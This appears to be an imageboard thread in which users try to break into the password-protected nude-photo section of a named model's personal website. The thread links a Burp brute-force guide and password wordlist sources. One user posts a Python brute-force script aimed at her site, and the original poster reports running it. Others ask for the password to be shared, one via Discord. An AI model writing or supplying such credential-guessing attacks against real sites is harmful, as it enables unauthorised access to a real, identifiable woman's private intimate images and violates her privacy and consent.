I just discovered this model (in photo) and found out she has a nudes section on her website... unfortunately its password protected. I've taken my limited web coding skills as far as I can now.
Anyone have ideas to get past the password?
I just discovered this model (in photo) and found out she has a nudes section on her website... unfortunately its password protected. I've taken my limited web coding skills as far as I can now.
Anyone have ideas to get past the password?
Other urls found in this thread:
carmenchristina com/nudes forgot that part
support.portswigger. net/customer/portal/articles/1964020-using-burp-to-brute-force-a-login-page
Thank you! might have to resort to brute force at this point. Thanks for pointing the way to something built to do it
please post the password when you get it done
Absolutely! I feel like there might be some good stuff in there, considering what she already posts online
working on the previously posted brute force solution. In case someone else has any ideas I will keep posting for a bit while I learn this software
Imma write my own python script anyone got a quality wordlist?
import requests
class BruteForce:
def __init__(self):
self.baseurl = "carmenchristina.com
self.wordlist = [ word.rstrip("\n") for word in open("wordlist.txt", "r") ]
self.headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
def brute(self):
tries = 0
for password in self.wordlist:
print(f"[ {tries} ] trying password {password}")
if self.sendRequest(password):
print(f"Login successfull! The password is {password}")
tries += 1
def sendRequest(self, password):
isSuccess = False
data = { "password": password, "url": "nudes" }
result = requests.post(self.baseurl, data=data, headers=self.headers)
data_json = result.json()
if data_json['isSuccess'] == 1:
isSuccess = True
return isSuccess
def main():
bf = BruteForce()
if __name__ == '__main__':
hmm the site seems to force https for some reason which is currently causing issues with the burp proxy. googling solutions
Check this script out it's working I just need a good wordlist
Oh! Nice ill look for a word list then
Yea Forums fucked the formatting up tho try the script on
pastebin com/nYSnZG9p
wiki.skullsecurity org/Passwords
hashes org/hashlists.php
some lists
>pastebin com/nYSnZG9p
Yea, I noticed the improper python formatting lol
Downloading python IDE, assuming its python 3 code
Yeah it's python 3
Cool, running your code with the first list from that skullsecurity website since its full of more common passwords. Fingers crossed she used a simple pass!
or I would be running it if I wasn't having an Issue installing requests XD
Never have I regretted buying a mac more than this moment
Cool, got past that bug. Syntax error now that I'm looking into
There shouldn't be any syntax errors it's working for me
correct, it was a MacOS thing where it defaulted to python 2 in terminal (and they wanted me to upgrademy OS to fix it...). moved to windows and it worked. although now python is having trouble with invalid characters in my word list. oh boy haha
yeah I had that problem too with a wordlist from your site. Just use a different one
Finally running! You're amazing. thank you
Post your findings!
No problem, you're welcome send the password to me on Discord if you get it please iwannaseeall#7840
If ("password") = incorrect:
Print ("correct_password")
cool, saved just in case the thread dies. Also, just to point out, when entering passwords to the webpage it doesnt seem to send anything to the server as far as I can tell... Could they be doing client side authentication?
what sayin